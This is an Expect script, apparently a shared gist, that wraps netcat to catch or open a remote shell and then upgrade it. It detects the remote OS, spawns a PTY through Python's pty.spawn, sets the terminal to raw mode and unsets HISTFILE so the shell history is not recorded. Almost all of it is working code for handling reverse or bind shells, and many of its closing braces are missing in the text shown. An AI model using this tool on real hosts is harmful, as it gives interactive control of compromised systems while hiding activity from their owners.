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Created May 24, 2018 14:45
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# nca - nc wrapper by SNADO team
# Requires: expect, nc and optionally tmux
set LISTEN false
set ADDR ""
set PORT 0
set TMUX false
set UDP ""
set KILL true
set argsCount [llength $argv];
set i 0
while { $i < $argsCount } {
switch [lindex $argv $i] {
"-l" {
set LISTEN true
"-u" {
set UDP "-u"
"-t" {
set TMUX true
"-k" {
set KILL false
default {
if { $i == $argsCount-2 } {
set ADDR [lindex $argv $i]
} else {
set PORT [lindex $argv $i]
set i [expr $i+1];
if { $PORT > 0 && ($LISTEN == true || $ADDR != "") } {
if { $LISTEN == true } {
if { $ADDR == "" } {
set CMD "(nc $UDP -lvp $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')"
} else {
set CMD "(nc $UDP -lvp $PORT -s $ADDR; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')"
set MSG "\[\033\[94m*\033\[0m\] Waiting for connections on $ADDR:$PORT"
set EXP "onnect"
} else {
set CMD "(nc -v $UDP $ADDR $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5''\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')"
#set CMD "($arg3 nc -v $ADDR $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')"
set MSG "\[\033\[94m*\033\[0m\] Connecting to $ADDR:$PORT"
set EXP "open"
log_user 0
set timeout -1
spawn "/bin/bash"
send "$CMD\n"
puts $MSG
expect {
$EXP {
puts "\[\033\[92m+\033\[0m\] Connected"
send "echo 'un''ix'\n"
#sleep 0.2
sleep 0.5
expect {
"unix" {
puts "\[\033\[92m+\033\[0m\] Unix detected"
if { $LISTEN == true && $TMUX == true } {
send \x1A
if { $ADDR != "" } {
send "tmux new-window -d '$::argv0 -l -t $ADDR $PORT'\n"
} else {
send "tmux new-window -d '$::argv0 -l -t $PORT'\n"
send "fg\n"
"'un''ix'" {
puts "\[\033\[92m+\033\[0m\] Windows detected"
if { $LISTEN == true && $TMUX == true } {
send \x1A
if { $ADDR != "" } {
send "tmux new-window -d '$::argv0 -l -t $ADDR $PORT'\n"
} else {
send "tmux new-window -d '$::argv0 -l -t $PORT'\n"
send "fg\n"
expect ")"
expect ")"
expect ")"
send "\n"
interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3" return
puts ""
puts "\[\033\[94m*\033\[0m\] Terminated"
send "unset HISTFILE\n"
send "p=`which python python2 python3 python2.7 python3.5 python2.6 python3.4 python3.6 | xargs | cut -d ' ' -f 1`;if \[ ! -z \$p \]; then echo 'P''YTHON-OK'; \$p -c 'import pty;pty.spawn(\"/bin/bash\")'; else echo 'P''YTHON-ERR'; fi\n"
expect {
set ROWS [exec tput lines]
set COLS [exec tput cols]
puts "\[\033\[92m+\033\[0m\] python found"
expect {
"$ " {
"# " {
"% " {
send \x1A
puts "\[\033\[94m*\033\[0m\] Setting terminal"
expect ":"
send "stty raw -echo\n"
send "fg\n"
expect {
"$ " {
"# " {
"% " {
if { $KILL == true } {
send "kill -s 9 `ps -fp \$PPID | awk \"/\$PPID/\"' { print \$3 } '`\n"
send "reset\n"
expect {
"$ " {
"# " {
"% " {
send "id\n"
expect {
"Terminal type?" {
send "xterm-256color\n"
"uid=" {
send "stty rows $ROWS columns $COLS\n"
send "export SHELL=bash\n"
send "export TERM=xterm-256color\n"
send "unset HISTFILE\n"
send "clear\n"
#send "uname -a; id\n"
sleep 0.5
interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\n" return
puts "\[\033\[91m-\033\[0m\] python not found"
puts "\[\033\[92m+\033\[0m\] Interacting"
send "uname -a; id\n"
interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3" return
puts ""
puts "\[\033\[94m*\033\[0m\] Terminated"
"Connection refused" {
puts "\[\033\[91m-\033\[0m\] Connection refused"
"Permission denied" {
puts "\[\033\[91m-\033\[0m\] Permission denied"
"forward host lookup failed" {
puts "\[\033\[91m-\033\[0m\] Forward host lookup failed"
"Cannot assign requested address" {
puts "\[\033\[91m-\033\[0m\] Cannot assign requested address"
"invalid port" {
puts "\[\033\[91m-\033\[0m\] Invalid port"
"invalid local port" {
puts "\[\033\[91m-\033\[0m\] Invalid local port"
"Address already in use" {
puts "\[\033\[91m-\033\[0m\] Address already in use"
"*** buffer overflow detected ***" {
puts "\[\033\[91m-\033\[0m\] *** buffer overflow detected ***"
} else {
puts "Usage: $::argv0 \[-l\] \[-t\] \[addr\] port"
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